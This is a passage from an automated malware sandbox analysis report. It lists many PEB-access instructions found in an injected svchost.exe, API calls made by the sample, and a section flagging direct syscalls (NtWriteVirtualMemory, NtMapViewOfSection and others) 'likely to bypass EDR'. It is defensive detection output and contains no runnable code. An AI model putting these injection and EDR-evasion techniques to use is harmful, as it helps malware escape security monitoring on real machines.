            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EA456 mov eax, dword ptr fs:[00000030h]6_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342645D mov eax, dword ptr fs:[00000030h]6_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345245A mov eax, dword ptr fs:[00000030h]6_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BC460 mov ecx, dword ptr fs:[00000030h]6_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]6_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]6_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345A470 mov eax, dword ptr fs:[00000030h]6_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]6_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]6_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468402 mov eax, dword ptr fs:[00000030h]6_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]6_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]6_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342E420 mov eax, dword ptr fs:[00000030h]6_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342C427 mov eax, dword ptr fs:[00000030h]6_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6420 mov eax, dword ptr fs:[00000030h]6_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A430 mov eax, dword ptr fs:[00000030h]6_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034304E5 mov ecx, dword ptr fs:[00000030h]6_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EA49A mov eax, dword ptr fs:[00000030h]6_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034364AB mov eax, dword ptr fs:[00000030h]6_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034644B0 mov ecx, dword ptr fs:[00000030h]6_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BA4B0 mov eax, dword ptr fs:[00000030h]6_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4B4B mov eax, dword ptr fs:[00000030h]6_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4B4B mov eax, dword ptr fs:[00000030h]6_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03502B57 mov eax, dword ptr fs:[00000030h]6_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6B40 mov eax, dword ptr fs:[00000030h]6_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6B40 mov eax, dword ptr fs:[00000030h]6_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FAB40 mov eax, dword ptr fs:[00000030h]6_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D8B42 mov eax, dword ptr fs:[00000030h]6_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428B50 mov eax, dword ptr fs:[00000030h]6_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DEB50 mov eax, dword ptr fs:[00000030h]6_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342CB7E mov eax, dword ptr fs:[00000030h]6_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504B00 mov eax, dword ptr fs:[00000030h]6_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AEB1D mov eax, dword ptr fs:[00000030h]6_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EB20 mov eax, dword ptr fs:[00000030h]6_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EB20 mov eax, dword ptr fs:[00000030h]6_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F8B28 mov eax, dword ptr fs:[00000030h]6_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F8B28 mov eax, dword ptr fs:[00000030h]6_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]6_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]6_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03450BCB mov eax, dword ptr fs:[00000030h]6_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]6_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]6_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430BCD mov eax, dword ptr fs:[00000030h]6_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DEBD0 mov eax, dword ptr fs:[00000030h]6_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]6_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]6_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438BF0 mov eax, dword ptr fs:[00000030h]6_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EBFC mov eax, dword ptr fs:[00000030h]6_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BCBF0 mov eax, dword ptr fs:[00000030h]6_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440BBE mov eax, dword ptr fs:[00000030h]6_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440BBE mov eax, dword ptr fs:[00000030h]6_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4BB0 mov eax, dword ptr fs:[00000030h]6_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E4BB0 mov eax, dword ptr fs:[00000030h]6_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436A50 mov eax, dword ptr fs:[00000030h]6_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440A5B mov eax, dword ptr fs:[00000030h]6_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440A5B mov eax, dword ptr fs:[00000030h]6_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]6_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]6_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA6F mov eax, dword ptr fs:[00000030h]6_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DEA60 mov eax, dword ptr fs:[00000030h]6_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034ACA72 mov eax, dword ptr fs:[00000030h]6_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034ACA72 mov eax, dword ptr fs:[00000030h]6_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BCA11 mov eax, dword ptr fs:[00000030h]6_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA24 mov eax, dword ptr fs:[00000030h]6_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345EA2E mov eax, dword ptr fs:[00000030h]6_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03454A35 mov eax, dword ptr fs:[00000030h]6_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03454A35 mov eax, dword ptr fs:[00000030h]6_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346CA38 mov eax, dword ptr fs:[00000030h]6_2_0346CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]6_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]6_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486ACC mov eax, dword ptr fs:[00000030h]6_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430AD0 mov eax, dword ptr fs:[00000030h]6_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03464AD0 mov eax, dword ptr fs:[00000030h]6_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03464AD0 mov eax, dword ptr fs:[00000030h]6_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346AAEE mov eax, dword ptr fs:[00000030h]6_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346AAEE mov eax, dword ptr fs:[00000030h]6_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA80 mov eax, dword ptr fs:[00000030h]6_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504A80 mov eax, dword ptr fs:[00000030h]6_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468A90 mov edx, dword ptr fs:[00000030h]6_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438AA0 mov eax, dword ptr fs:[00000030h]6_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438AA0 mov eax, dword ptr fs:[00000030h]6_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03486AA4 mov eax, dword ptr fs:[00000030h]6_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B0946 mov eax, dword ptr fs:[00000030h]6_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504940 mov eax, dword ptr fs:[00000030h]6_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]6_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]6_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03456962 mov eax, dword ptr fs:[00000030h]6_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E mov eax, dword ptr fs:[00000030h]6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E mov edx, dword ptr fs:[00000030h]6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347096E mov eax, dword ptr fs:[00000030h]6_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D4978 mov eax, dword ptr fs:[00000030h]6_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D4978 mov eax, dword ptr fs:[00000030h]6_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BC97C mov eax, dword ptr fs:[00000030h]6_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE908 mov eax, dword ptr fs:[00000030h]6_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE908 mov eax, dword ptr fs:[00000030h]6_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BC912 mov eax, dword ptr fs:[00000030h]6_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428918 mov eax, dword ptr fs:[00000030h]6_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03428918 mov eax, dword ptr fs:[00000030h]6_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B892A mov eax, dword ptr fs:[00000030h]6_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C892B mov eax, dword ptr fs:[00000030h]6_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C69C0 mov eax, dword ptr fs:[00000030h]6_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A9D0 mov eax, dword ptr fs:[00000030h]6_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034649D0 mov eax, dword ptr fs:[00000030h]6_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FA9D3 mov eax, dword ptr fs:[00000030h]6_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BE9E0 mov eax, dword ptr fs:[00000030h]6_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034629F9 mov eax, dword ptr fs:[00000030h]6_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034629F9 mov eax, dword ptr fs:[00000030h]6_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A0 mov eax, dword ptr fs:[00000030h]6_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034309AD mov eax, dword ptr fs:[00000030h]6_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034309AD mov eax, dword ptr fs:[00000030h]6_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B89B3 mov esi, dword ptr fs:[00000030h]6_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B89B3 mov eax, dword ptr fs:[00000030h]6_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B89B3 mov eax, dword ptr fs:[00000030h]6_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03442840 mov ecx, dword ptr fs:[00000030h]6_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03460854 mov eax, dword ptr fs:[00000030h]6_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434859 mov eax, dword ptr fs:[00000030h]6_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434859 mov eax, dword ptr fs:[00000030h]6_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BE872 mov eax, dword ptr fs:[00000030h]6_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BE872 mov eax, dword ptr fs:[00000030h]6_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6870 mov eax, dword ptr fs:[00000030h]6_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6870 mov eax, dword ptr fs:[00000030h]6_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BC810 mov eax, dword ptr fs:[00000030h]6_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03452835 mov eax, dword ptr fs:[00000030h]6_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03452835 mov eax, dword ptr fs:[00000030h]6_2_03452835
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_00E681F7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00E3A395
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3A364 SetUnhandledExceptionFilter,4_2_00E3A364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtOpenKeyEx: Direct from: 0x77763C9CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtQueryValueKey: Direct from: 0x77762BECJump to behavior
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
